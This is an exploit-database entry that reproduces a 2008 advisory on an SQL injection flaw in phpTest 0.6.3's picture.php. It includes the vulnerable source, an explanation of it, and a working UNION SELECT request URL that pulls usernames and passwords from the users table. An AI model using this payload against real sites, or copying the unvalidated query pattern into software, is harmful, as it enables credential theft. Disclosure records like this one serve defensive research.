header-logo
Suggest Exploit
vendor:
phptest
by:
cOndemned [ Dark-Coders ]
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: phptest
Affected Version From: 2000.6.3
Affected Version To: 2000.6.3
Patch Exists: NO
Related CWE: N/A
CPE: a:phptest:phptest:0.6.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

phpTest 0.6.3 (picture.php image_id) Remote SQL Injection Vulnerability

There is absolutly no validation of $image_id + We can se amount of columns - 2. An attacker can exploit this vulnerability by sending a malicious HTTP request with a crafted image_id parameter. The malicious request will be in the form of http://[host]/[phpTest]/picture.php?image_id=-1+union+select+1,concat_ws(0x3a3a,username,password)+from+users/*

Mitigation:

Validate user input and use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

########################################################################################
#
#   Name   : phpTest 0.6.3 (picture.php image_id) Remote SQL Injection Vulnerability
#   Author : cOndemned [ Dark-Coders ]
#   Dork   : sorry, today no dork [;
#   Greetz : ZaBeaTy, str0ke, GregStar, Voo|doo, ixos, 0in, suN8Hclf, TBH, Avantura :*
#
########################################################################################

Source code of "picture.php" :

    24.    pt_register('GET', 'image_id');
    25.
    26.    if (isset($image_id)) {
    27.        $result = $db->query("SELECT filetype, data FROM images WHERE image_id = $image_id");
    28.
    29.        if ($db->num_rows($result)) {
    30.            $row = $db->fetch_object($result);
    31.            header("Content-type: $row->filetype");
    32.            echo $row->data;

Description :

    line 24 - $image_id is taken from user using $_GET method
    line 27 - There is absolutly no validation of $image_id + We can se amount of columns - 2
    line 31 - header type doesn't matter....
    line 32 - Result of MySQL Query is being printed here.
        
Exploit :

    http://[host]/[phpTest]/picture.php?image_id=-1+union+select+1,concat_ws(0x3a3a,username,password)+from+users/*

# milw0rm.com [2008-07-25]

Navigation

Suggest Exploit

Services By CQR